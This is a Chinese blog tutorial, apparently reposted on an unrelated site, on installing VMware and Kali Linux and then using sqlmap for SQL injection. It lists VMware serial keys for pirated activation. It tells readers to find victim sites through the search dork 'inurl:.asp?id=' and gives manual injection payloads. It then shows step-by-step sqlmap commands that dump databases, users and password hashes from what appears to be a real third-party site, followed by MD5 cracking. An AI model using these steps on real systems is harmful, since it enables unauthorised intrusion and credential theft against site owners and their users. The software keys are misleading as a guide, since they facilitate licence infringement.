肥宅钓鱼网
当前位置: 首页 钓鱼百科

win10自带虚拟机安装kali报错(网络安全.虚拟机VMware)

时间:2023-08-04 作者: 小编 阅读量: 1 栏目名: 钓鱼百科

Sqlmap是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。通过人为猜解,知道登录表位usr。

一.虚拟机安装

1.首先需要下载VMware虚拟机,并对其进行安装。下载地址:https://www.vmware.com/cn.html

2.选择合适的版本进行下载,作者这里安装的版本为“VMware-workstation-full-12.5.2-4638234.ext”,并且上传至百度云分享给大家。

3.双击EXE文件,开始进行安装。

4.安装完成之后输入序列号激活。

5A02H-AU243-TZJ49-GTC7K-3C61N VF5XA-FNDDJ-085GZ-4NXZ9-N20E6UC5MR-8NE16-H81WY-R7QGV-QG2D8ZG1WH-ATY96-H80QP-X7PEX-Y30V4AA3E0-0VDE1-0893Z-KGZ59-QGAVF

5.运行VMware软件如下图所示,接下来需要进行第二部分的Kali配置。

二.创建虚拟机并载入Kali Linux

1.去Kali官网Downloads页面下载64位Kali Linux的torrent文件,再通过迅雷下载。下载地址:https://www.kali.org/downloads/,作者百度云网盘已上传。

2.下载成功后,新建虚拟机,选择“自定义”设置。

3.导入下载好的Kali Linux镜像文件,选择操作系统为Linux。

4.输入虚拟机的名称和安装位置。

5.设置内存分配大小,建议不要超过提示的最大内存推荐。

6.接着点击下一步,包括。

7.选择磁盘容量大小,建议比分配容量大些,并设为。

8.创建完成之后,如下图所示。

三.安装Kali Linux

1.开启虚拟机,进入安装界面,如下图所示,点击“开启此虚拟机”。

2.选择安装方式为“Graphical install”。

3.选择语言“中文简体”和地区“中国”,点击“继续”按钮安装。

4.自定义主机名,默认为“kali”,域名直接跳过即可。

5.设置用户密码,这是类似于Windows的开机密码,接着安装。

6.设置磁盘分区。

7.接着接续安装。

8.在询问是否要选择网络镜像时,如果你的网络很好可以选择是,这里我选择否。

下面这个GRUB安装至硬盘要选择“是”!

9.安装成功之后,等待系统重启即安装完成。

10.最终界面如下图所示。

Kali其他设置包括分辨率、中文输入、全屏显示等,请同学们自行百度学习。

四.Kali功能介绍

1.信息收集

2.漏洞分析

3.Web程序

4.数据库评估软件

5.密码攻击

6.无线攻击

7.逆向工程

8.漏洞利用工具集

9.嗅探/欺骗

10.权限维护

11.数字取证

12.报告工具集

13.Social Engineering Tools

打开某个软件,如下图所示。

五.SQLmap基本用法

下面作者结合Sqlmap简单讲述一个Kali环境中的实战案例。

Web漏洞包括网站本身漏洞、软件漏洞、服务器漏洞、外部攻击等,其拿站的基本方法包括通用型、SQL注入、DDoS、XXS跨站、越权漏洞、旁站注入、CSRF跨站请求、上传漏洞、支付漏洞等。

Sqlmap 是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。

Sqlmap的基本流程如下:

找注入点并检测:sqlmap –u “链接”

列库显示数据库:sqlmap –u “链接” --dbs

列表显示表:sqlmap –u “链接” –D 数据库 --tables

列字段显示表中字段: sqlmap –u “链接” –D 数据库 –T 表名 --columns

爆内容显示字段内容:sqlmap –u “链接” –D 数据库 –T 表名 –C 字段 --dump

作者本来想以“实验吧”的CTF题目作为测试地址(http://ctf5.shiyanbar.com/8/index.php?id=1),但最近它维修中,无法访问;但使用“inurl:.asp?id=”未能搜索到目标网站。希望读者后续尝试“实验吧”的那个例子,或者自行搭建本地网站环境进行SQL注入学习。

第一步:寻找目标网站,通过浏览器“inurl:.asp?id=”搜索,寻找存在SQL注入漏洞的目标,可以先尝试手工注入判断。

判断注入点的方法很多,比如show.asp?code=115’ 加单引号,show.asp?code=115-1 减1,这里介绍一个经典的方法。

(1) http://xxxxx/show.asp?code=115’ and 1=1 – (正常显示)

对应的SQL语句:

select … from table where code=‘115’ and 1=1 – and xxxx;

单引号(’)匹配code='115,然后and连接,1=1恒成立,注释(–)掉后面语句。

(2) http://xxxxx/show.asp?code=115’ and 1=2 – (错误显示)

对应的SQL语句:

select … from table where code=‘115’ and 1=2 – and xxxx;

单引号(’)匹配code='115,然后and连接,1=2恒错误,注释(–)掉后面语句。

但很多网站都会有防火墙,防止SQL注入,如下图所示。

第二步:打开Kali环境中的Sqlmap环境,如下图所示。(后续采用之前的文章进行讲解,也希望读者自己尝试下)

第三步:获取所有数据库。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --dbs

运行结果如下图所示,获取9个数据库,其中–dbs参数表示databases。

第四步:获取当前数据库。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-db

运行结果如下图所示,获取9个数据库。其中–current-db参数表示当前数据库,相当于前文MSSQL的db_name()获取数据库字段。输出结果:akykd_new。

第五步:获取数据库当前用户。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-user

运行结果如下图所示,获取当前数据库用户sa。

第六步:获取数据库所有用户和密码。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --passwords

运行结果如下图所示,获取数据库用户和密码。

第七步:获取数据库所有表。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new --tables

运行结果如下图所示,获取数据库ahykd_new的所有表,其中-D表示数据库,–tables表示所有表。通过人为猜解,知道登录表位usr。

第八步:获取数据库登录表所有字段。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr --columns

运行结果如下图所示,获取数据库ahykd_new的登录表usr所有字段,其中-D表示数据库,-T表示表,–columns表示usr表所有列。

是不是感觉到了SQLMAP的强大,其中用户名usr_name、密码passwd。

第九步:获取数据库登录表用户名和密码。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr -C "usr_name,password" --dump

获取数据库ahykd_new的登录表usr所有字段,其中-D表示数据库,-T表示表,-C表示输出字段(usr_name、passwd),–dump输出所有值。

如果字段内容太多,可以设置输出个数,如10个用户名和密码。参数:-D ahykd_new -T usr -C “usr_name,passwd” --start 1 --stop 10 --dump

正常的输出结果例如下图所示,再通过md5解密即可。

六.总结

又忙了16个小时,发现自己网络安全方向的基础非常薄弱,有太多实践知识想学,太多学术论文想看,每天都在忙碌,过程非常艰辛,博士哪有这么好毕业。但是这种苦中带甜,充实的滋味又让我陶醉,还有远方的女神、许多朋友和博友的陪伴。希望未来在网络态势感知、恶意代码检测、嫌疑识别和知识图谱方面能再深入点,多读文献,多找创新,加油。

天行健,君子以自强不息。

地势坤,君子以厚德载物。

最后希望基础性文章对您有所帮助,作者也是这个领域的菜鸟一枚,希望与您共同进步,共勉。

    推荐阅读
  • 简单交通事故赔偿协议包括什么

    交通事故赔偿协议书需要双方当事人写明身份信息,再然后写明赔偿的内容,违约责任等。交通事故的损失是由非机动车驾驶人、行人故意碰撞机动车造成的,机动车一方不承担赔偿责任。

  • 梦幻西游手游小号金币怎么给大号 梦幻西游手游小号金币怎么给大号买

    在梦幻西游手游中,许多游戏玩家为了不充钱打造角色。通过肝许多个小号来打金为大号提供打造资金来源。点击界面上的“我要出售”选项。小号金币转给大号步骤四:最后将刚才获得烹饪产物全部进行上架出售。因为每个角色摆摊上架的数量有限的。再者同账号角色这样交易容易被制裁。最后在上架时,一定要将价格设定在没有其他玩家上架的区间。游戏玩家在使用小号角色找到大号上架的产物进行购买即可完成转移。

  • iphone11Pro怎么隐藏单个软件(苹果11怎么隐藏软件)

    iphone11Pro怎么隐藏单个软件,1、待机状态下,点击苹果手机桌面上的设置图标。2、滑动屏幕选项,找到屏幕使用时间。3、点击进入内容和隐私访问限制之后,输入屏幕使用时间的密码即可进入。4、然后点击运行的应用选项。5、点击想要隐藏起来的系统应用右边的按钮,绿色代表显示。

  • 表示觉得无所谓词语成语(表示觉得无所谓词语成语有哪些)

    表示觉得无所谓词语成语?若无其事,形容好像没有那么回事似的;,今天小编就来说说关于表示觉得无所谓词语成语?下面更多详细答案一起来看看吧!指对眼前事物漠不关心;不闻不问,对于别人说的事情不听,也不主动去问,形容对事情不在乎;冷眼旁观,以冷淡的眼光在一旁观看。

  • 为什么越来越多的人想要练瑜伽(为什么我劝你夏天更要练瑜伽)

    同时由于夏季高温,可以帮助皮肤毛孔打开,滋润皮肤、消除暑气、增强机体免疫力,起到冬病夏治的作用。尤其在盛夏季节,你会感觉在每一次大汗淋漓后带来那种身心的舒畅!

  • 熄火后没关车灯没事吧 熄火后没关车灯没事吧

    有些搭载自动大灯的汽车在熄火锁车后,车灯是可以自动关闭的。电瓶是汽车上一个很重要的部件,电瓶负责为全车电子设备供电,也负责启动发动机,如果电瓶没电了,会耽误自己用车。电瓶是需要更换的,电瓶长时间使用性能会下降。在平时没有启动发动机时,不要打开车灯,也不要在车内长时间听音乐,更不要打开空调,这样会降低电瓶的使用寿命。如果电压和内阻达不到规定数值,那就需要更换电瓶了。

  • 治疗痛风发作要掌握这些小窍门(痛风有哪些治疗方法)

    痛风虽然是一种无法根治的疾病,但是在经过相应的治疗后,还是能稳定尿酸,预防痛风发作的。但具体的服用方法,我们需根据医生的指导进行,不然会给身体吃出问题。而且要定期体检,定期检测尿酸,这样才能知道自身的病情如何,也能根据病情来调整药物服用第二个是推拿治疗,对于患有痛风的病人来说,推拿治疗也是一个不错的治疗方法。当然也提醒痛风病人,在生活中,多注意运动,多喝水,也是辅助缓解痛风的方法

  • iphone已停用怎么解锁教程(如何解除iPhone已停用)

    iphone已停用怎么解锁教程第一种解除方法:通过苹果iCloud定位解除。如果您的iPhone已经绑定了iCloud账号,并且有开启手机定位找回功能。如果您的设备处于停用状态,爱思助手将无法读取和备份设备数据。解除“已停用”的操作会抹掉iPhone数据,无法保存设备内的资料和数据。下载并打开爱思助手PC端,使用数据线将设备连接到电脑,处于停用状态下的设备无法直接连接爱思助手,请手动将您的设备进入恢复模式。刷机完成之后移动设备将自动开机。

  • 自己如何鉴定玉的真假(怎么鉴定玉的真假)

    看价格,一般来说,假冒的玉石都品相非常完美,颜色艳丽,质地干净,无瑕疵等。这个时候我们就要注意价格了,如果一件玉石的品相非常完美,而价格又很低,那么就要警惕了。千万不要以为自己可以捡漏,毕竟现在的商家都是很聪明的。

  • 羊蝎子是羊的哪个部位(羊的什么位置是羊蝎子)

    羊蝎子是羊的哪个部位羊蝎子是羊脊椎骨,因其形跟蝎子相似,故而俗称羊蝎子。羊蝎子低脂肪、低胆固醇、高蛋白,富含钙质。易于吸收,有滋阴补肾,美颜壮阳功效。常用来做清汤火锅,味道鲜美。羊蝎子需要追溯到康熙年间,蒙古王爷奈曼王有次打猎回来路过后院闻见香气扑鼻。跟下人打听才知道是新来的厨子给下人们炖羊脊骨吃。然后看脊骨那形状酷似一只蝎子,就起名为“羊蝎子”并且作为府上的食谱。结果后来就传到民间了。